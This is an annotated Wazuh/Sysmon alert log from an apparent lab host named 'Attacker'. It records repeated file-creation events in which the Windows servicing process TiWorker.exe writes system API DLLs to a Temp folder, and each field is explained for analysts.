data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-20 01:55:28.222
ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00}
ProcessId: 12512
Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe
TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\downlevel\api-ms-win-core-comm-l1-1-0.dll
CreationUtcTime: 2025-04-20 01:55:28.222
User: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-20 01:55:28.222 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-532b-6804-6b09-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12512 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\downlevel\\api-ms-win-core-comm-l1-1-0.dll No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-20 01:55:28.222 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable dropped in Windows root folder Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92217 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1570'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Lateral Movement'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Lateral Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 23 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534154.688458 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:55:28.2260495Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 260608 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-20 01:55:28.224
ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00}
ProcessId: 12512
Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe
TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\downlevel\api-ms-win-core-console-l1-1-0.dll
CreationUtcTime: 2025-04-20 01:55:28.224
User: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-20 01:55:28.224 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-532b-6804-6b09-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12512 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\downlevel\\api-ms-win-core-console-l1-1-0.dll No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-20 01:55:28.224 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable dropped in Windows root folder Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92217 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1570'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Lateral Movement'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Lateral Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 24 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534154.691560 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:55:28.2285695Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 260609 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-20 01:55:28.226
ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00}
ProcessId: 12512
Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe
TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\downlevel\api-ms-win-core-datetime-l1-1-0.dll
CreationUtcTime: 2025-04-20 01:55:28.226
User: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-20 01:55:28.226 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-532b-6804-6b09-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12512 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\downlevel\\api-ms-win-core-datetime-l1-1-0.dll No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-20 01:55:28.226 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable dropped in Windows root folder Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92217 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1570'] List of ATT&CK IDs matched (e.g., T1059). If you see high-risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Lateral Movement'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Lateral Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 25 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534154.694666 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:55:28.2312480Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 260610 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-20 01:55:28.231
ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00}
ProcessId: 12512
Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe
TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\downlevel\api-ms-win-core-datetime-l1-1-1.dll
CreationUtcTime: 2025-04-20 01:55:28.228
User: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-20 01:55:28.231 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-532b-6804-6b09-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12512 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\downlevel\\api-ms-win-core-datetime-l1-1-1.dll No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-20 01:55:28.228 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable dropped in Windows root folder Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92217 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1570'] List of ATT&CK IDs matched (e.g., T1059). If you see high-risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Lateral Movement'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Lateral Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 26 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534154.697772 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:55:28.2331969Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 260611 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-20 01:55:28.231
ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00}
ProcessId: 12512
Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe
TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\downlevel\api-ms-win-core-debug-l1-1-0.dll
CreationUtcTime: 2025-04-20 01:55:28.231
User: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-20 01:55:28.231 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-532b-6804-6b09-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12512 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\downlevel\\api-ms-win-core-debug-l1-1-0.dll No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-20 01:55:28.231 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable dropped in Windows root folder Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92217 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1570'] List of ATT&CK IDs matched (e.g., T1059). If you see high-risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Lateral Movement'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Lateral Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 27 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534154.700866 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:55:28.2352253Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 260612 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-20 01:55:28.233
ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00}
ProcessId: 12512
Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe
TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\downlevel\api-ms-win-core-debug-l1-1-1.dll
CreationUtcTime: 2025-04-20 01:55:28.233
User: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-20 01:55:28.233 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-532b-6804-6b09-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12512 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\downlevel\\api-ms-win-core-debug-l1-1-1.dll No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-20 01:55:28.233 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable dropped in Windows root folder Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92217 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1570'] List of ATT&CK IDs matched (e.g., T1059). If you see high-risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Lateral Movement'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Lateral Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 28 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534154.703960 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:55:28.2373860Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 260613 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-20 01:55:28.235
ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00}
ProcessId: 12512
Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe
TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\downlevel\api-ms-win-core-delayload-l1-1-0.dll
CreationUtcTime: 2025-04-20 01:55:28.235
User: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-20 01:55:28.235 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-532b-6804-6b09-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12512 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\downlevel\\api-ms-win-core-delayload-l1-1-0.dll No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-20 01:55:28.235 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable dropped in Windows root folder Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92217 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1570'] List of ATT&CK IDs matched (e.g., T1059). If you see high-risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Lateral Movement'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Lateral Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 29 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534154.707070 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
